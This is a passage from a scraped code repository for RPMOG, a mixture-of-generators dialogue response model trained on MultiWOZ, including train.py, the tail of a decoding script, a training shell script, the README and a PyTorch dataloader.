args.model_path\n Best_Valid_Score = None\n Best_Test_Score = None\n Best_PPL = None\n Best_model_id = 0\n Best_val_dials_gen = {}\n Best_test_dials_gen = {}\n for ii in range(1, args.no_models + 1):\n print(30 * '-' + 'EVALUATING EPOCH %s' % ii)\n # args.model_path = args.model_path + '-' + str(ii)\n with torch.no_grad():\n Valid_Score, val_dials_gen, val_ppl, Test_Score, test_dials_gen, test_ppl = decode(ii, beam_search)\n if Best_Valid_Score is None or Best_Valid_Score[-2] < Valid_Score[-2]:\n Best_Valid_Score = Valid_Score\n Best_Test_Score = Test_Score\n Best_PPL = test_ppl\n Best_val_dials_gen = val_dials_gen\n Best_test_dials_gen = test_dials_gen\n Best_model_id = ii\n # try:\n # decode(ii, intent2index)\n # except:\n # print('cannot decode')\n\n # save best generated output to json\n print('Summary'+'~'*50)\n print('Best model: %s'%(Best_model_id))\n BLEU, MATCHES, SUCCESS, SCORE, P, R, F1 = Best_Test_Score\n mode = 'Test'\n print('%s PPL: %.2f' % (mode, Best_PPL))\n print('%s BLEU: %.4f' % (mode, BLEU))\n print('%s Matches: %2.2f%%' % (mode, MATCHES))\n print('%s Success: %2.2f%%' % (mode, SUCCESS))\n print('%s Score: %.4f' % (mode, SCORE))\n print('%s Precision: %.2f%%' % (mode, P))\n print('%s Recall: %.2f%%' % (mode, R))\n print('%s F1: %.2f%%' % (mode, F1))\n suffix = 'bm' if beam_search else 'gd'\n try:\n with open(args.valid_output + 'val_dials_gen_%s.json' % suffix, 'w') as outfile:\n json.dump(Best_val_dials_gen, outfile, indent=4)\n except:\n print('json.dump.err.valid')\n try:\n with open(args.decode_output + 'test_dials_gen_%s.json' % suffix, 'w') as outfile:\n json.dump(Best_test_dials_gen, 
outfile, indent=4)\n except:\n print('json.dump.err.test')\n\nif __name__ == '__main__':\n # create dir for generated outputs of valid and test set\n pp_mkdir(args.valid_output)\n pp_mkdir(args.decode_output)\n evaluator = MultiWozEvaluator('MultiWozEvaluator')\n print('\\n\\nGreedy Search'+'='*50)\n decodeWrapper(beam_search=False)\n print('\\n\\nBeam Search' + '=' * 50)\n decodeWrapper(beam_search=True)\n # evaluteNLGFile(gen_dials_fpath='results/bsl_20190510161309/data/test_dials/test_dials_gen.json',\n # ref_dialogues_fpath='data/test_dials.json')\n # evaluteNLGFiles(gen_dials_fpaths=['results/bsl_20190510161309/data/test_dials/test_dials_gen.json',\n # 'results/moe1_20190510165545/data/test_dials/test_dials_gen.json'],\n # ref_dialogues_fpath='data/test_dials.json')\n # from nlgeval import compute_metrics\n # metrics_dict = compute_metrics(hypothesis='/Users/pp/Code/nlg-eval/examples/hyp.txt',\n # references=['/Users/pp/Code/nlg-eval/examples/ref1.txt'])\n\n" }, { "alpha_fraction": 0.6122468709945679, "alphanum_fraction": 0.6233891844749451, "avg_line_length": 52.4766845703125, "blob_id": "acfc91d5aa5c20c66b1f89821b471ef159604f49", "content_id": "2d8c5a91773800467efa84e42c349b2cf1ee893c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20642, "license_type": "no_license", "max_line_length": 222, "num_lines": 386, "path": "/train.py", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "# coding=utf-8\nfrom __future__ import division, print_function, unicode_literals\n\nimport argparse\nimport json\nimport random\nimport datetime\nfrom io import open\nimport os\nimport shutil\n\nimport numpy as np\nimport torch\nfrom torch.optim import Adam\nimport torch.nn as nn\n\nfrom utils import util, multiwoz_dataloader\nfrom models.model import Model\nfrom utils.util import detected_device, PAD_token, pp_mkdir\nfrom multiwoz.Evaluators import *\n# from tqdm import tqdm\n# SOS_token = 0\n# EOS_token = 1\n# UNK_token = 2\n# PAD_token = 3\n\n# pp added: print out env\nutil.get_env_info()\n\nall_start_time = datetime.datetime.now()\nprint('Start time={}'.format(all_start_time.strftime(\"%Y-%m-%d %H:%M:%S\")))\n\nparser = argparse.ArgumentParser(description='multiwoz1-bsl-tr')\n# Group args\n# 1. 
Data & Dirs\ndata_arg = parser.add_argument_group(title='Data')\ndata_arg.add_argument('--data_dir', type=str, default='data/multi-woz', help='the root directory of data')\ndata_arg.add_argument('--log_dir', type=str, default='logs')\ndata_arg.add_argument('--result_dir', type=str, default='results/bsl')\ndata_arg.add_argument('--pre_model_dir', type=str, default='results/moe4_gru-27062/model')\ndata_arg.add_argument('--model_name', type=str, default='translate.ckpt')\n\n# 2.Network\nnet_arg = parser.add_argument_group(title='Network')\nnet_arg.add_argument('--cell_type', type=str, default='lstm')\nnet_arg.add_argument('--attention_type', type=str, default='bahdanau')\nnet_arg.add_argument('--depth', type=int, default=1, help='depth of rnn')\nnet_arg.add_argument('--emb_size', type=int, default=50)\nnet_arg.add_argument('--hid_size_enc', type=int, default=150)\nnet_arg.add_argument('--hid_size_dec', type=int, default=150)\nnet_arg.add_argument('--hid_size_pol', type=int, default=150)\nnet_arg.add_argument('--max_len', type=int, default=50)\nnet_arg.add_argument('--vocab_size', type=int, default=400, metavar='V')\nnet_arg.add_argument('--use_attn', type=util.str2bool, nargs='?', const=True, default=True) # F\nnet_arg.add_argument('--use_emb', type=util.str2bool, nargs='?', const=True, default=False)\n\n# 3.Train\ntrain_arg = parser.add_argument_group(title='Train')\ntrain_arg.add_argument('--mode', type=str, default='train', help='training or testing: test, train, RL')\ntrain_arg.add_argument('--optim', type=str, default='adam')\ntrain_arg.add_argument('--max_epochs', type=int, default=20) # 15\ntrain_arg.add_argument('--lr_rate', type=float, default=0.005)\ntrain_arg.add_argument('--lr_decay', type=float, default=0.0)\ntrain_arg.add_argument('--l2_norm', type=float, default=0.00001)\ntrain_arg.add_argument('--clip', type=float, default=5.0, help='clip the gradient by norm')\ntrain_arg.add_argument('--teacher_ratio', type=float, default=1.0, help='probability of using targets for learning')\ntrain_arg.add_argument('--dropout', type=float, default=0.0)\ntrain_arg.add_argument('--early_stop_count', type=int, default=2)\ntrain_arg.add_argument('--epoch_load', type=int, default=0)\ntrain_arg.add_argument('--load_param', type=util.str2bool, nargs='?', const=True, default=False)\ntrain_arg.add_argument('--start_epoch', type=int, default=0) # when to use SentMoE\n\n# 4. MISC\nmisc_arg = parser.add_argument_group('MISC')\nmisc_arg.add_argument('--seed', type=int, default=0, metavar='S', help='random seed (default: 1)')\nmisc_arg.add_argument('--batch_size', type=int, default=64, metavar='N', help='input batch size for training (default: 64)')\nmisc_arg.add_argument('--db_size', type=int, default=30)\nmisc_arg.add_argument('--bs_size', type=int, default=94)\nmisc_arg.add_argument('--beam_width', type=int, default=10, help='Beam width used in beamsearch')\n#\n# 5. Here add new args\nnew_arg = parser.add_argument_group('New')\nnew_arg.add_argument('--intent_type', type=str, default=None, help='separate experts by intents: None, domain, sysact or domain_act') # pp added\n# different implementation of moe\n# 1. only weight loss & hyper weights\n# --use_moe_loss=True --learn_loss_weight=False --use_moe_model=False\n# 2. only weight loss & learn weights\n# --use_moe_loss=True --learn_loss_weight=True --use_moe_model=False\n# 3. only split models\n# --use_moe_loss=False --learn_loss_weight=False --use_moe_model=True\n# 4. 
both & hyper weights\n# --use_moe_loss=True --learn_loss_weight=False --use_moe_model=True\n# 5. both & learn weights\n# --use_moe_loss=True --learn_loss_weight=True --use_moe_model=True\nnew_arg.add_argument('--use_moe_loss', type=util.str2bool, nargs='?', const=True, default=False, help='inner models weighting loss')\nnew_arg.add_argument('--learn_loss_weight', type=util.str2bool, nargs='?', const=True, default=False, help='learn weight of moe loss')\nnew_arg.add_argument('--use_moe_model', type=util.str2bool, nargs='?', const=True, default=False, help='inner models structure partition')\nnew_arg.add_argument('--debug', type=util.str2bool, nargs='?', const=True, default=False, help='if True use small data for debugging')\nnew_arg.add_argument('--train_valid', type=util.str2bool, nargs='?', const=True, default=False, help='if True add valid data for training')\n\nnew_arg.add_argument('--train_ratio', type=float, default=1.0) # use xx percent of training data\nnew_arg.add_argument('--lambda_expert', type=float, default=0.5) # use xx percent of training data\nnew_arg.add_argument('--mu_expert', type=float, default=0.5) # use xx percent of training data\nnew_arg.add_argument('--gamma_expert', type=float, default=0.5) # use xx percent of training data\nnew_arg.add_argument('--SentMoE', type=util.str2bool, nargs='?', const=True, default=False, help='if True use sentence info')\nnew_arg.add_argument('--if_detach', type=util.str2bool, nargs='?', const=True, default=False) # if detach expert parts\nnew_arg.add_argument('--rp_share_rnn', type=util.str2bool, nargs='?', const=True, default=True) # if detach expert parts\nnew_arg.add_argument('--future_info', type=str, default='proba') # use hidd or proba\n\nargs = parser.parse_args()\nargs.device = detected_device.type\nprint('args.device={}'.format(args.device))\nprint('args.intent_type={}'.format(args.intent_type))\n\n# construct dirs\nargs.model_dir = '%s/model' % args.result_dir\nargs.train_output = '%s/data/train_dials' % args.result_dir\nargs.valid_output = '%s/data/valid_dials' % args.result_dir\nargs.decode_output = '%s/data/test_dials' % args.result_dir\nargs.delex_path = '%s/delex.json' % args.data_dir\nprint(args)\n\n# pp added: init seed\nutil.init_seed(args.seed)\n\ndef trainOne(print_loss_total,print_act_total, print_grad_total, input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor=None, name=None):\n\n loss, loss_acts, grad = model.model_train(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor, bs_tensor, mask_tensor, name)\n # pp added: experts' loss\n # print('@'*20, '\\n', target_tensor)\n '''\n if args.use_moe_loss and False: # data separate by intents\n gen_loss_list = []\n if mask_tensor is not None: # data separate by intents\n # print(mask_tensor)\n for mask in mask_tensor: # each intent has a mask [Batch, 1]\n target_tensor_i = target_tensor.clone()\n target_tensor_i = target_tensor_i.masked_fill_(mask, value=PAD_token)\n # print(mask)\n # print(target_tensor_i)\n # print('*'*50)\n loss_i, loss_acts_i, grad_i = model.model_train(input_tensor, input_lengths, target_tensor_i, target_lengths, db_tensor, bs_tensor, mask_tensor, name)\n gen_loss_list.append(loss_i)\n # print('loss', loss, '; mean_experts_loss', torch.mean(torch.tensor(gen_loss_list)), '\\ngen_loss_list', ['%.4f' % s if s!=0 else '0' for s in gen_loss_list])\n\n # mu_expert = 0.5\n mu_expert = args.mu_expert\n loss = (1 - mu_expert) * loss + mu_expert * torch.mean(torch.tensor(gen_loss_list))\n '''\n\n 
#print(loss, loss_acts)\n print_loss_total += loss\n print_act_total += loss_acts\n print_grad_total += grad\n\n model.global_step += 1\n model.sup_loss = torch.zeros(1)\n\n return print_loss_total, print_act_total, print_grad_total\n\n\ndef trainIters(model, intent2index, n_epochs=10, args=args):\n prev_min_loss, early_stop_count = 1 << 30, args.early_stop_count\n start = datetime.datetime.now()\n # Valid_Scores, Test_Scores = [], []\n Scores = []\n val_dials_gens, test_dials_gens = [], []\n origin = args.SentMoE # original flag\n for epoch in range(1, n_epochs + 1):\n # pp added\n if origin:\n if epoch > args.start_epoch:\n args.SentMoE = True\n print('BeginSentMOE', '-'*50)\n else:\n args.SentMoE = False\n print('%s\\nEpoch=%s (%s %%)' % ('~'*50, epoch, epoch / n_epochs * 100))\n print_loss_total = 0; print_grad_total = 0; print_act_total = 0 # Reset every print_every\n start_time = datetime.datetime.now()\n # watch out where do you put it\n model.optimizer = Adam(lr=args.lr_rate, params=filter(lambda x: x.requires_grad, model.parameters()), weight_decay=args.l2_norm)\n model.optimizer_policy = Adam(lr=args.lr_rate, params=filter(lambda x: x.requires_grad, model.policy.parameters()), weight_decay=args.l2_norm)\n # Training\n model.train()\n step = 0\n for data in train_loader: # each element of data tuple has [batch_size] samples\n step += 1\n model.optimizer.zero_grad()\n model.optimizer_policy.zero_grad()\n # Transfer to GPU\n if torch.cuda.is_available():\n data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor = data\n print_loss_total, print_act_total, print_grad_total = trainOne(print_loss_total, print_act_total, print_grad_total, input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor)\n if step > 1 and args.debug:\n break # for debug\n if args.train_ratio!=1.0 and step > args.train_ratio * len(train_loader):\n break # only train of\n\n train_len = len(train_loader) # 886 data # len(train_loader.dataset.datasets) # 8423 dialogues\n print_loss_avg = print_loss_total / train_len\n print_act_total_avg = print_act_total / train_len\n print_grad_avg = print_grad_total / train_len\n print('Train Time:%.4f' % (datetime.datetime.now() - start_time).seconds)\n print('Train Loss: %.6f\\nTrain Grad: %.6f' % (print_loss_avg, print_grad_avg))\n\n if not args.debug:\n step = 0\n\n # VALIDATION\n if args.train_valid: # if add valid data for training\n model.train()\n valid_loss = 0\n for name, val_file in list(val_dials.items())[-step:]:\n loader = multiwoz_dataloader.get_loader_by_dialogue(val_file, name,\n input_lang_word2index, output_lang_word2index,\n args.intent_type, intent2index)\n data = iter(loader).next()\n # Transfer to GPU\n if torch.cuda.is_available():\n data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor = data\n proba, _, _ = model.forward(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor,\n bs_tensor, mask_tensor) # pp added: mask_tensor\n proba = proba.view(-1, model.vocab_size) # flatten all predictions\n loss = model.gen_criterion(proba, target_tensor.view(-1))\n valid_loss += loss.item()\n valid_len = len(val_dials) # 1000\n valid_loss /= valid_len\n # pp added: evaluate valid\n print('Train Valid Loss: %.6f' % valid_loss)\n\n # pp 
added\n with torch.no_grad():\n model.eval()\n val_dials_gen = {}\n valid_loss = 0\n for name, val_file in list(val_dials.items())[-step:]: # for py3\n loader = multiwoz_dataloader.get_loader_by_dialogue(val_file, name,\n input_lang_word2index, output_lang_word2index,\n args.intent_type, intent2index)\n data = iter(loader).next()\n # Transfer to GPU\n if torch.cuda.is_available():\n data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor = data\n proba, _, _ = model.forward(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor,\n bs_tensor, mask_tensor) # pp added: mask_tensor\n proba = proba.view(-1, model.vocab_size) # flatten all predictions\n loss = model.gen_criterion(proba, target_tensor.view(-1))\n valid_loss += loss.item()\n # pp added: evaluation - Plan A\n # models.eval()\n output_words, loss_sentence = model.predict(input_tensor, input_lengths, target_tensor, target_lengths,\n db_tensor, bs_tensor, mask_tensor)\n # models.train()\n val_dials_gen[name] = output_words\n valid_len = len(val_dials) # 1000\n valid_loss /= valid_len\n\n # pp added: evaluate valid\n print('Valid Loss: %.6f' % valid_loss)\n # BLEU, MATCHES, SUCCESS, SCORE, P, R, F1\n Valid_Score = evaluator.summarize_report(val_dials_gen, mode='Valid')\n # Valid_Score = evaluateModel(val_dials_gen, val_dials, delex_path, mode='Valid')\n val_dials_gens.append(val_dials_gen) # save generated output for each epoch\n # Testing\n # pp added\n model.eval()\n test_dials_gen ={}\n test_loss = 0\n for name, test_file in list(test_dials.items())[-step:]:\n loader = multiwoz_dataloader.get_loader_by_dialogue(test_file, name,\n input_lang_word2index, output_lang_word2index,\n args.intent_type, intent2index)\n data = iter(loader).next()\n # Transfer to GPU\n if torch.cuda.is_available():\n data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor = data\n proba, _, _ = model.forward(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor,\n bs_tensor, mask_tensor) # pp added: mask_tensor\n proba = proba.view(-1, model.vocab_size) # flatten all predictions\n\n loss = model.gen_criterion(proba, target_tensor.view(-1))\n test_loss += loss.item()\n\n output_words, loss_sentence = model.predict(input_tensor, input_lengths, target_tensor, target_lengths,\n db_tensor, bs_tensor, mask_tensor)\n\n test_dials_gen[name] = output_words\n # pp added: evaluate test\n test_len = len(test_dials) # 1000\n test_loss /= test_len\n # pp added: evaluate valid\n print('Test Loss: %.6f' % valid_loss)\n Test_Score = evaluator.summarize_report(test_dials_gen, mode='Test')\n # Test_Score = evaluateModel(test_dials_gen, test_dials, delex_path, mode='Test')\n test_dials_gens.append(test_dials_gen)\n\n try:\n with open(args.decode_output + '/test_dials_gen_%s.json' % epoch, 'w') as outfile:\n json.dump(test_dials_gen, outfile, indent=4)\n except:\n print('json.dump.err.test')\n\n model.train()\n # pp added: evaluation - Plan B\n # print(50 * '=' + 'Evaluating start...')\n # # eval_with_train(models)\n # eval_with_train3(models, val_dials, mode='valid')\n # eval_with_train3(models, test_dials, mode='test')\n # print(50 * '=' + 'Evaluating end...')\n\n model.saveModel(epoch)\n # BLEU, MATCHES, SUCCESS, SCORE, TOTAL\n Scores.append(tuple([epoch]) + Valid_Score + 
tuple(['%.2f'%np.exp(valid_loss)]) + Test_Score + tuple(['%.2f'%np.exp(test_loss)])) # combine the tuples; 11 elements\n\n # summary of evaluation metrics\n import pandas as pd\n # BLEU, MATCHES, SUCCESS, SCORE, P, R, F1\n fields = ['Epoch',\n 'Valid BLEU', 'Valid Matches', 'Valid Success', 'Valid Score', 'Valid P', 'Valid R', 'Valid F1', 'Valid PPL',\n 'Test BLEU', 'Test Matches', 'Test Success', 'Test Score', 'Test P', 'Test R', 'Test F1', 'Test PPL']\n df = pd.DataFrame(Scores, columns=fields)\n sdf = df.sort_values(by=['Valid Score'], ascending=False)\n print('Top3:', '=' * 60)\n print(sdf.head(3).transpose())\n print('Best:', '=' * 60) # selected by valid score\n best_df = sdf.head(1)[['Epoch', 'Test PPL', 'Test BLEU', 'Test Matches', 'Test Success', 'Test Score', 'Test P', 'Test R', 'Test F1']]\n print(best_df.transpose())\n # save best prediction to json, evaluated on valid set\n best_model_id = np.int(best_df['Epoch']) - 1 # epoch start with 1\n try:\n with open(args.valid_output + '/val_dials_gen.json', 'w') as outfile:\n json.dump(val_dials_gens[best_model_id], outfile, indent=4)\n except:\n print('json.dump.err.valid')\n try:\n with open(args.decode_output + '/test_dials_gen.json', 'w') as outfile:\n json.dump(test_dials_gens[best_model_id], outfile, indent=4)\n except:\n print('json.dump.err.test')\n return best_df\n\n\nif __name__ == '__main__':\n input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index = util.loadDictionaries(mdir=args.data_dir)\n\n # pp added: load intents\n intent2index, index2intent = util.loadIntentDictionaries(intent_type=args.intent_type, intent_file='{}/intents.json'.format(args.data_dir)) if args.intent_type else (None, None)\n\n # pp added: data loaders\n train_loader = multiwoz_dataloader.get_loader('{}/train_dials.json'.format(args.data_dir), input_lang_word2index, output_lang_word2index, args.intent_type, intent2index, batch_size=args.batch_size)\n # valid_loader_list = multiwoz_dataloader.get_loader_by_full_dialogue('{}/val_dials.json'.format(args.data_dir), input_lang_word2index, output_lang_word2index, args.intent_type, intent2index)\n # test_loader_list = multiwoz_dataloader.get_loader_by_full_dialogue('{}/test_dials.json'.format(args.data_dir), input_lang_word2index, output_lang_word2index, args.intent_type, intent2index)\n # Load validation file list:\n with open('{}/val_dials.json'.format(args.data_dir)) as outfile:\n val_dials = json.load(outfile)\n # Load test file list:\n with open('{}/test_dials.json'.format(args.data_dir)) as outfile:\n test_dials = json.load(outfile)\n\n # delex_path = '%s/delex.json' % args.data_dir\n\n # create dir for generated outputs of valid and test set\n pp_mkdir(args.valid_output)\n pp_mkdir(args.decode_output)\n\n model = Model(args, input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index, intent2index, index2intent)\n # models = nn.DataParallel(models, device_ids=[0,1]) # latter for parallel\n model = model.to(detected_device)\n\n if args.load_param:\n model.loadModel(args.epoch_load)\n\n\n evaluator = MultiWozEvaluator('MultiWozEvaluator', delex_path=args.delex_path)\n\n # Test_Score = evaluator.summarize_report(test_dials_gen, mode='Test')\n\n trainIters(model, intent2index, n_epochs=args.max_epochs, args=args)\n\n all_end_time = datetime.datetime.now()\n print('End time={}'.format(all_end_time.strftime(\"%Y-%m-%d %H:%M:%S\")))\n print('Use time={} seconds'.format((all_end_time-all_start_time).seconds))\n" }, { "alpha_fraction": 
0.682692289352417, "alphanum_fraction": 0.6971153616905212, "avg_line_length": 40.400001525878906, "blob_id": "3c6e38330fa604ac933733aa2e3aedbc6223651d", "content_id": "12ba35eb5fafe6111dcbfe8a3361c46def86de83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 208, "license_type": "no_license", "max_line_length": 114, "num_lines": 5, "path": "/train.sh", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nmkdir -p logs\nsource activate multiwoz\nTIMESTAMP=`date \"+%Y%m%d%H%M%S\"`\npython2 -u train.py --data_dir='../multiwoz1-moe/data' --debug=True --max_epochs=2 >> logs/laptop-$TIMESTAMP.train\n\n" }, { "alpha_fraction": 0.6272370219230652, "alphanum_fraction": 0.6499345302581787, "avg_line_length": 26.2738094329834, "blob_id": "bfc0702c4f0c276369549e531d979b6cb25bccb2", "content_id": "55b760ecf5ade3f94b9f2f46175022bf334d4192", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2291, "license_type": "no_license", "max_line_length": 225, "num_lines": 84, "path": "/README.md", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "# RPMOG\n\nTo facilitate reproducibility, we release the source code for paper \"[Retrospective and Prospective Mixture-of-Generators for Task-oriented Dialogue Response Generation](https://ecai2020.eu/papers/92_paper.pdf)\" on ECAI 2020.\n\nPlease contact me by email ([email protected]) if any questions and **cite** our paper if you use any resources and/or codes in this repository. \n\n# Requirements\nPython 3 with pip\n\n# Quick start\nIn repo directory:\n\n## Install the required packages\n- Using Conda:\n```console\ncd multiwoz-mdrg\nconda create --name multiwoz python=3.7 anaconda\nsource activate multiwoz\nconda install --file requirements.txt \nconda install pytorch torchvision -c pytorch\n``` \n\n## Preprocessing\nTo download and pre-process the data run:\n\n```python multiwoz/Create_delex_data.py```\n\n## For debugging\nTo debug train.py, you can add the following parameteres to save time\n--debug=True --emb_size=5 --hid_size_dec=5 --hid_size_enc=5 --hid_size_pol=5 --max_epochs=2\n\nTo debug test.py, the parameters are:\n--debug=True --no_models=2 --beam_width=2\n\n## Training\nTo train the model run:\n\n```python train.py [--args=value]```\n\nSome of these args include:\n\n```\n// hyperparamters for model learning\n--max_epochs : numbers of epochs\n--batch_size : numbers of turns per batch\n--lr_rate : initial learning rate\n--clip : size of clipping\n--l2_norm : l2-regularization weight\n--dropout : dropout rate\n--optim : optimization method\n\n// network structure\n--emb_size : word vectors emedding size\n--use_attn : whether to use attention\n--hid_size_enc : size of RNN hidden cell\n--hid_size_pol : size of policy hidden output\n--hid_size_dec : size of RNN hidden cell\n--cell_type : specify RNN type\n```\n\n## Testing\nTo evaluate the run:\n\n```python test.py [--args=value]```\n\n## Hyperparamters\n```\n// hyperparamters for model learning\n--max_epochs : 20\n--batch_size : 64\n--lr_rate : 0.005\n--clip : 5.0\n--l2_norm : 0.00001\n--dropout : 0.0\n--optim : Adam\n\n// network structure\n--emb_size : 50\n--use_attn : True\n--hid_size_enc : 150\n--hid_size_pol : 150\n--hid_size_dec : 150\n--cell_type : gru\n```\n" }, { "alpha_fraction": 0.6219512224197388, "alphanum_fraction": 0.6336160898208618, "avg_line_length": 48.625, "blob_id": 
"3e50d45cff8b79c7f96622e188c1aae41eccce5e", "content_id": "3949045fd22bc3332437b848805c232c213f84b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7544, "license_type": "no_license", "max_line_length": 161, "num_lines": 152, "path": "/utils/multiwoz_dataloader.py", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Function :\n@License : Copyright(C), ILPS group, Univeristy of Amsterdam\n@Author : Jiahuan Pei\n@Contact : [email protected]\n@Data: 2019-03-28\n\"\"\"\nimport torch\nimport nltk, sys\nfrom torch.utils.data import Dataset, DataLoader, ConcatDataset\nfrom utils.util import *\nimport json\nfrom utils.util import default_device\n\nclass MultiwozSingleDataset(Dataset):\n \"\"\"Custom data.Dataset compatible with data.DataLoader.\"\"\"\n def __init__(self, val_file, name, src_word2id, trg_word2id, intent_type=None, intent2index=None):\n \"\"\"Reads source and target sequences from txt files.\"\"\"\n self.val_file = val_file\n self.name = name # the name of json dialogue\n self.src_word2id = src_word2id\n self.trg_word2id = trg_word2id\n self.intent2index = intent2index\n self.intent_type = intent_type\n self.device = default_device # torch.device('cpu')\n self.input_tensor, self.target_tensor, self.bs_tensor, self.db_tensor, self.mask_tensor = self.SingleDialogueJSON2Tensors()\n self.datalen = self.__len__()\n\n def __getitem__(self, index): # data for one dialogue file\n \"\"\"Returns one data pair (source and target).\"\"\"\n input_tensor, target_tensor, bs_tensor, db_tensor = \\\n self.input_tensor[index], self.target_tensor[index], self.bs_tensor[index], self.db_tensor[index]\n mask_tensor = self.mask_tensor[index] if self.mask_tensor else None\n return input_tensor, target_tensor, bs_tensor, db_tensor, mask_tensor\n\n def __len__(self):\n return len(self.input_tensor)\n\n def input_word2index(self, index):\n if index in self.src_word2id:\n return self.src_word2id[index]\n else:\n return UNK_token\n\n def out_word2index(self, index):\n if index in self.trg_word2id:\n return self.trg_word2id[index]\n else:\n return UNK_token\n\n def SingleDialogueJSON2Tensors(self):\n val_file = self.val_file\n input_tensor = []; target_tensor = []; bs_tensor = []; db_tensor = []; mask_tensor = []\n for idx, (usr, sys, bs, db, acts) in enumerate(\n zip(val_file['usr'], val_file['sys'], val_file['bs'], val_file['db'], val_file['acts'])):\n tensor = [self.input_word2index(word) for word in usr.strip(' ').split(' ')] + [EOS_token] # models.input_word2index(word)\n input_tensor.append(torch.as_tensor(tensor, dtype=torch.long, device=self.device)) # .view(-1, 1))\n\n tensor = [self.out_word2index(word) for word in sys.strip(' ').split(' ')] + [EOS_token]\n target_tensor.append(torch.as_tensor(tensor, dtype=torch.long, device=self.device)) # .view(-1, 1)\n # target_tensor.append(torch.LongTensor(tensor)) # .view(-1, 1)\n\n bs_tensor.append([float(belief) for belief in bs])\n db_tensor.append([float(pointer) for pointer in db])\n\n # pp added: mask_i=0 if i_th it contains i_th intent\n if self.intent2index:\n tensor = torch.ones(len(self.intent2index), 1)\n # change acts & find index\n intent_type = self.intent_type\n if intent_type == 'domain':\n inds = [self.intent2index[act.split('-')[0]] for act in acts]\n elif intent_type == 'sysact':\n inds = [self.intent2index[act.split('-')[1]] for act in acts]\n elif intent_type == 'domain_act':\n inds = 
[self.intent2index[act] for act in acts] # the index of the chosen intents\n tensor[:][inds] = 0\n mask_tensor.append(torch.as_tensor(tensor, dtype=torch.uint8, device=self.device))\n\n return input_tensor, target_tensor, bs_tensor, db_tensor, mask_tensor # each one is a list of tensor\n\ndef collate_fn(data, device=default_device):\n \"\"\"Creates mini-batch tensors from the list of tuples\n \"\"\"\n # batch.sort(key=lambda x: len(x[1]), reverse=True)\n has_mask_tensor = True if data[0][-1] is not None else False\n input_tensor, target_tensor, bs_tensor, db_tensor, mask_tensor = zip(*data)\n\n input_tensor, input_lengths = padSequence(input_tensor)\n target_tensor, target_lengths = padSequence(target_tensor)\n bs_tensor = torch.as_tensor(bs_tensor, dtype=torch.float, device=device)\n db_tensor = torch.as_tensor(db_tensor, dtype=torch.float, device=device)\n mask_tensor = torch.stack(mask_tensor).permute((1, 0, 2)) if has_mask_tensor else None\n # mask_tensor = torch.stack(mask_tensor).permute((1, 0, 2)) if mask_tensor[0] and mask_tensor[0] != [] else None\n\n # data = input_tensor, target_tensor, bs_tensor, db_tensor, mask_tensor\n # if torch.cuda.is_available():\n # data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n return input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor # tensors [batch_size, *]\n\ndef get_loader(file_path, src_word2id, trg_word2id, intent_type=None, intent2index=None, batch_size=1):\n \"\"\"Returns data loader for train in turn-level.\n \"\"\"\n dials = json.load(open(file_path))\n dataset_list = []\n for name in dials.keys():\n val_file = dials[name]\n # build a custom dataset\n dataset = MultiwozSingleDataset(val_file, name, src_word2id, trg_word2id, intent_type, intent2index)\n dataset_list.append(dataset)\n datasets = ConcatDataset(dataset_list)\n # data loader for custome dataset\n data_loader = DataLoader(dataset=datasets,\n batch_size=batch_size,\n shuffle=True,\n num_workers=0,\n collate_fn=collate_fn)\n return data_loader\n\ndef get_loader_by_dialogue(val_file, name, src_word2id, trg_word2id, intent_type=None, intent2index=None):\n '''Return a dataloader for a full dialogue, the batch size is the len of the dialogue'''\n dataset = MultiwozSingleDataset(val_file, name, src_word2id, trg_word2id, intent_type, intent2index)\n batch_size = len(dataset)\n data_loader = DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=False, # donnot change the order\n num_workers=0,\n collate_fn=collate_fn)\n return data_loader\n\ndef get_loader_by_full_dialogue(file_path, src_word2id, trg_word2id, intent_type=None, intent2index=None):\n '''Return a list of dataloader, each one load a full dialogue data'''\n dials = json.load(open(file_path))\n data_loader_list = []\n for name in dials.keys():\n val_file = dials[name]\n data_loader = get_loader_by_dialogue(val_file, name, src_word2id, trg_word2id, intent_type, intent2index)\n data_loader_list.append(data_loader)\n return data_loader_list\n\nif __name__ == \"__main__\":\n data_dir = '../multiwoz1-moe/data'\n # intent_type = 'domain'\n intent_type = None\n input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index = loadDictionaries(mdir=data_dir)\n intent2index, index2intent = loadIntentDictionaries(intent_type=intent_type, intent_file='{}/intents.json'.format(data_dir)) if intent_type else 